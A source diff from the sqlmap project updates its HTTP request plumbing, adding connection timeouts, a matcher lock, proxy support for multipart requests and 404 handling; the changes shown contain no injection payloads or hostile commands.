+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+import sys
 import httplib
 import urllib2

+from lib.core.data import conf
+
 class HTTPSCertAuthHandler(urllib2.HTTPSHandler):
    def __init__(self, key_file, cert_file):
        urllib2.HTTPSHandler.__init__(self)
        self.key_file = key_file
        self.cert_file = cert_file
+
    def https_open(self, req):
        return self.do_open(self.getConnection, req)
+
    def getConnection(self, host):
-        return httplib.HTTPSConnection(host, key_file=self.key_file, cert_file=self.cert_file)
+        if sys.version_info >= (2,6):
+            retVal = httplib.HTTPSConnection(host, key_file=self.key_file, cert_file=self.cert_file, timeout=conf.timeout)
+        else:
+            retVal = httplib.HTTPSConnection(host, key_file=self.key_file, cert_file=self.cert_file)
+        return retVal
--- a/lib/request/comparison.py
+++ b/lib/request/comparison.py
@@ -5,7 +5,7 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
@@ -65,9 +65,15 @@ def comparison(page, headers=None, getSeqMatcher=False):
        else:
            return False

+    if conf.seqLock:
+        conf.seqLock.acquire()
+
    conf.seqMatcher.set_seq2(page)
    ratio = round(conf.seqMatcher.ratio(), 3)

+    if conf.seqLock:
+        conf.seqLock.release()
+
    # If the url is stable and we did not set yet the match ratio and the
    # current injected value changes the url page content
    if conf.matchRatio is None:
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -5,7 +5,7 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
@@ -31,11 +31,11 @@ import urlparse
 import traceback

 from lib.contrib import multipartpost
-from lib.core.common import sanitizeCookie
 from lib.core.convert import urlencode
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
+from lib.core.common import sanitizeAsciiString
 from lib.core.exception import sqlmapConnectionException
 from lib.request.basic import decodePage
 from lib.request.basic import forgeHeaders
@@ -70,58 +70,58 @@ class Connect:
        direct    = kwargs.get('direct',    False)
        multipart = kwargs.get('multipart', False)
        silent    = kwargs.get('silent',    False)
+        raise404  = kwargs.get('raise404',  True)

        page            = ""
        cookieStr       = ""
        requestMsg      = "HTTP request:\n%s " % conf.method
+        requestMsg     += "%s" % urlparse.urlsplit(url)[2] or "/"
        responseMsg     = "HTTP response "
        requestHeaders  = ""
        responseHeaders = ""

-        if re.search("http[s]*://%s" % conf.hostname, url, re.I):
-            requestMsg += "%s" % conf.path or "/"
-        else:
-            requestMsg += "%s" % urlparse.urlsplit(url)[2] or "/"
-
-        if silent:
-            socket.setdefaulttimeout(3)
-
-        if direct:
-            if "?" in url:
-                url, params = url.split("?")
-                params = urlencode(params)
-                url = "%s?%s" % (url, params)
-                requestMsg += "?%s" % params
-
-        elif multipart:
-            multipartOpener = urllib2.build_opener(multipartpost.MultipartPostHandler)
-            conn = multipartOpener.open(url, multipart)
-            page = conn.read()
-            responseHeaders = conn.info()
-
-            encoding = responseHeaders.get("Content-Encoding")
-            page = decodePage(page, encoding)
-
-            return page
-
-        else:
-            if conf.parameters.has_key("GET") and not get:
-                get = conf.parameters["GET"]
-
-            if get:
-                get = urlencode(get)
-                url = "%s?%s" % (url, get)
-                requestMsg += "?%s" % get
-
-            if conf.method == "POST":
-                if conf.parameters.has_key("POST") and not post:
-                    post = conf.parameters["POST"]
-
-        requestMsg += " HTTP/1.1"
-
        try:
+            if silent:
+                socket.setdefaulttimeout(3)
+    
+            if direct:
+                if "?" in url:
+                    url, params = url.split("?")
+                    params = urlencode(params)
+                    url = "%s?%s" % (url, params)
+                    requestMsg += "?%s" % params
+    
+            elif multipart:
+                #needed in this form because of potential circle dependency problem (option -> update -> connect -> option)
+                from lib.core.option import proxyHandler
+                
+                multipartOpener = urllib2.build_opener(proxyHandler, multipartpost.MultipartPostHandler)
+                conn = multipartOpener.open(url, multipart)
+                page = conn.read()            
+                responseHeaders = conn.info()
+    
+                encoding = responseHeaders.get("Content-Encoding")
+                page = decodePage(page, encoding)
+    
+                return page
+    
+            else:
+                if conf.parameters.has_key("GET") and not get:
+                    get = conf.parameters["GET"]
+    
+                if get:
+                    get = urlencode(get)
+                    url = "%s?%s" % (url, get)
+                    requestMsg += "?%s" % get
+    
+                if conf.method == "POST":
+                    if conf.parameters.has_key("POST") and not post:
+                        post = conf.parameters["POST"]
+    
+            requestMsg += " HTTP/1.1"
+
            # Perform HTTP request
-            headers        = forgeHeaders(sanitizeCookie(cookie), ua)
+            headers        = forgeHeaders(cookie, ua)
            req            = urllib2.Request(url, post, headers)
            conn           = urllib2.urlopen(req)

@@ -172,26 +172,29 @@ class Connect:
                exceptionMsg  = "not authorized, try to provide right HTTP "
                exceptionMsg += "authentication type and valid credentials"
                raise sqlmapConnectionException, exceptionMsg
+            elif e.code == 404 and raise404:
+                exceptionMsg = "page not found"
+                raise sqlmapConnectionException, exceptionMsg
            else:
                page = e.read()
                code = e.code
                status = e.msg
                responseHeaders = e.info()

-        except (urllib2.URLError, socket.error, socket.timeout, httplib.BadStatusLine), _:
+                debugMsg = "got HTTP error code: %d" % code
+                logger.debug(debugMsg)
+
+        except (urllib2.URLError, socket.error, socket.timeout, httplib.BadStatusLine), e:
            tbMsg = traceback.format_exc()

            if "URLError" in tbMsg or "error" in tbMsg:
                warnMsg = "unable to connect to the target url"
-
            elif "timeout" in tbMsg:
                warnMsg = "connection timed out to the target url"
-
            elif "BadStatusLine" in tbMsg:
                warnMsg  = "the target url responded with an unknown HTTP "
                warnMsg += "status code, try to force the HTTP User-Agent "
                warnMsg += "header with option --user-agent or -a"
-
            else:
                warnMsg = "unable to connect to the target url"

@@ -206,7 +209,6 @@ class Connect:

            if silent:
                return None, None
-
            elif conf.retriesCount < conf.retries:
                conf.retriesCount += 1

@@ -217,13 +219,14 @@ class Connect:

                socket.setdefaulttimeout(conf.timeout)
                return Connect.__getPageProxy(**kwargs)
-
            else:
                socket.setdefaulttimeout(conf.timeout)
                raise sqlmapConnectionException, warnMsg

        socket.setdefaulttimeout(conf.timeout)

+        page = sanitizeAsciiString(page)
+        
        parseResponse(page, responseHeaders)
        responseMsg += "(%s - %d):\n" % (status, code)
        
--- a/Show More
+++ b/Show More